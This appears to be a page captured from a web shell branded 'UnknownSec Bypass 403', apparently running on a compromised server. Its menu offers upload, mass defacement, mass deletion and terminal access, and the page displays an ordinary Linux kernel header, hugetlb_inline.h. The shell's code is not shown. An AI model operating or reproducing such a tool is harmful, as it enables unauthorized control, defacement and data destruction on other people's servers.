UnknownSec Bypass
403
:
/
lib
/
modules
/
4.4.0-210-generic
/
build
/
include
/
linux
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
hugetlb_inline.h
#ifndef _LINUX_HUGETLB_INLINE_H #define _LINUX_HUGETLB_INLINE_H #ifdef CONFIG_HUGETLB_PAGE #include <linux/mm.h> static inline int is_vm_hugetlb_page(struct vm_area_struct *vma) { return !!(vma->vm_flags & VM_HUGETLB); } #else static inline int is_vm_hugetlb_page(struct vm_area_struct *vma) { return 0; } #endif #endif
Copyright © 2026 - UnknownSec